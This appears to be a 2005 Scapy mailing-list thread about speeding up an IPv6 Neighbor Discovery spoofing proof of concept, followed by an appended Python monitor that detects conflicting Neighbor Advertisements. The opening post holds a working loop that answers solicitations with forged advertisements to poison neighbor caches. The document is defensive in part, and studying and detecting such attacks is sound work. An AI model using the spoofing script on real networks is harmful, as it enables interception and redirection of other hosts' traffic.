Tony Doan | 5 Oct 2005 02:51

Scapy performance question

Hi,

I'm working on a proof of concept having to do with IPv6 and Neighbor  
Discovery. The idea is similar to ARP cache poisoning. The script sits  
in a while(1) looking for a particular type of icmpv6 packet. Then  
tries to respond before the "real" host can to deceive the original  
sender. Unfortunately in its current incarnation this takes around  
10 hundredths of a second longer than it takes for the "real" host to  
reply and all is lost. Does anyone have any tips on performance  
tuning python and/or scapy or is this just a limitation I need to  
learn to live with? :)

Here is the script snippet:

while(1):
    r = sniff(filter="icmp6", count=1, promisc=1)
    if r[0].haslayer(ICMPv6):
        if r[0].getlayer(ICMPv6).type == 135:
            srcmac = r[0].getlayer(Ether).src
            srcip = r[0].getlayer(IPv6).src
            sendp( Ether(src=evilmac,dst=srcmac)/IPv6(src=evilip,dst=srcip,hoplim=255)/ICMPv6(type=136)/ICMPv6MessageNeighbor(sa=evilip) )
            print r[0].getlayer(ICMPv6MessageNeighbor).sa

Please note I do the type checking in the scapy script instead of the  
sniff filter due to an ICMPv6 limitation in pcap (even the newest).

Thanks for any ideas.

Philippe Biondi | 5 Oct 2005 09:06

Re: Scapy performance question

On Tue, 4 Oct 2005, Tony Doan wrote:

> Please note I do the type checking in the scapy script instead of the sniff 
> filter due to an ICMPv6 limitation in pcap (even the newest).

This is the only way to really improve the code, though. Scapy is a bit 
long to disassemble a packet and will do it for every packet sniffed 
around, and that's why it increases the socket buffer at its max size. In 
your case, if there is some traffic at the same time, it is possible that 
you lost your match when the packet you're supposed to answer is still in 
the buffer. The only way to really improve performance is to filter as 
much as possible with BPF filters. You said it's broken for IPv6, but you 
still can put the tests on the ethernet header in a BPF, like source 
MAC and 0x86dd for ethertype.

As a side note, as noted by Arnaud, you can try psyco, but you're racing 
against kernel code, on a simple operation, with a host on the same 
network. Even a C program could lose this one.

-- 
Philippe Biondi <phil <at>  secdev.org>      SecDev.org
Computer Security/R&D                   http://www.secdev.org
PGP KeyID:3D9A43E2  FingerPrint:C40A772533730E39330DC0985EE8FF5F3D9A43E2
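The reply's point about filtering on the Ethernet header before Python touches the frame applies just as well to the defensive side of this race: a monitor that wants to notice Neighbor Advertisements contradicting earlier ones should also do its cheap checks (ethertype 0x86dd, next header 58, ICMPv6 type) first and full dissection last. The following is an added example, not code from the thread or from Scapy: a pure-Python parser and monitor for ICMPv6 Neighbor Advertisements that flags a target address suddenly advertised with a different link-layer address, or arriving with a hop limit other than 255 (RFC 4861 requires 255 for Neighbor Discovery). The BPF_FILTER string, the frame layout helper and the sample frames are assumptions constructed here for the example; the ICMPv6 checksum is not verified.

```python
import ipaddress
import struct
from collections import defaultdict

# Ethernet-header test from the reply, as a libpcap filter string. With scapy it
# would be passed as sniff(filter=BPF_FILTER, ...) so the kernel drops non-IPv6
# frames before Python sees them (assumed usage, not exercised in this example).
BPF_FILTER = "ether proto 0x86dd"

ETHERTYPE_IPV6 = 0x86DD
NEXT_HEADER_ICMPV6 = 58
ND_NEIGHBOR_ADVERTISEMENT = 136
OPT_TARGET_LINK_LAYER = 2
ETH_LEN, IP6_LEN, NA_FIXED_LEN = 14, 40, 24


def mac_to_str(mac):
    return ":".join("%02x" % b for b in mac)


def parse_neighbor_advertisement(frame):
    """Return a dict describing an ICMPv6 Neighbor Advertisement, or None.

    Checks run cheapest-first (ethertype, next header, ICMPv6 type), the same
    order a BPF program would use, so non-matching frames cost very little.
    """
    if len(frame) < ETH_LEN + IP6_LEN + NA_FIXED_LEN:
        return None
    if struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_IPV6:
        return None
    ip6 = frame[ETH_LEN:ETH_LEN + IP6_LEN]
    if ip6[6] != NEXT_HEADER_ICMPV6:          # byte 6 of the IPv6 header: next header
        return None
    icmp = frame[ETH_LEN + IP6_LEN:]
    if icmp[0] != ND_NEIGHBOR_ADVERTISEMENT:
        return None
    tll_mac = None
    off = NA_FIXED_LEN
    while off + 8 <= len(icmp):               # ND options come in 8-octet units
        opt_type, opt_len = icmp[off], icmp[off + 1]
        if opt_len == 0:                      # malformed option, stop parsing
            break
        if opt_type == OPT_TARGET_LINK_LAYER and opt_len == 1:
            tll_mac = icmp[off + 2:off + 8]
        off += opt_len * 8
    return {
        "src_mac": mac_to_str(frame[6:12]),
        "src_ip": str(ipaddress.IPv6Address(ip6[8:24])),
        "hop_limit": ip6[7],
        "target": str(ipaddress.IPv6Address(icmp[8:24])),
        "tll_mac": mac_to_str(tll_mac) if tll_mac else None,
    }


class NeighborAdvertisementMonitor:
    """Remembers which link-layer address each IPv6 target has been advertised
    with and reports frames that contradict earlier advertisements."""

    def __init__(self):
        self.seen = defaultdict(set)          # target IPv6 -> {MACs advertised}

    def observe(self, frame):
        """Return None for frames that are not NAs, else a list of alert strings."""
        na = parse_neighbor_advertisement(frame)
        if na is None:
            return None
        alerts = []
        if na["hop_limit"] != 255:            # RFC 4861: ND packets must carry hop limit 255
            alerts.append("hop limit %d, not 255" % na["hop_limit"])
        mac = na["tll_mac"] or na["src_mac"]
        known = self.seen[na["target"]]
        if known and mac not in known:
            alerts.append("%s previously advertised by %s, now by %s"
                          % (na["target"], ",".join(sorted(known)), mac))
        known.add(mac)
        return alerts


def build_na_frame(src_mac, src_ip, target_ip, tll_mac, hop_limit=255):
    """Constructed sample frame: Ethernet / IPv6 / ICMPv6 NA with a TLL option.
    Used only as test input for the monitor; checksum left at zero."""
    icmp = struct.pack("!BBHI", ND_NEIGHBOR_ADVERTISEMENT, 0, 0, 0x60000000)  # S+O flags
    icmp += ipaddress.IPv6Address(target_ip).packed
    icmp += bytes([OPT_TARGET_LINK_LAYER, 1]) + bytes.fromhex(tll_mac.replace(":", ""))
    ip6 = struct.pack("!IHBB", 0x60000000, len(icmp), NEXT_HEADER_ICMPV6, hop_limit)
    ip6 += ipaddress.IPv6Address(src_ip).packed + ipaddress.IPv6Address("ff02::1").packed
    eth = bytes.fromhex("333300000001") + bytes.fromhex(src_mac.replace(":", ""))
    eth += struct.pack("!H", ETHERTYPE_IPV6)
    return eth + ip6 + icmp
```

In practice the monitor would be fed raw frames from a sniffer opened with BPF_FILTER; everything that is not IPv6 never reaches parse_neighbor_advertisement, which is exactly the saving the reply describes. A first advertisement for a target is accepted as the baseline, so the monitor reports the change of link-layer address rather than deciding which of the two senders is legitimate.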
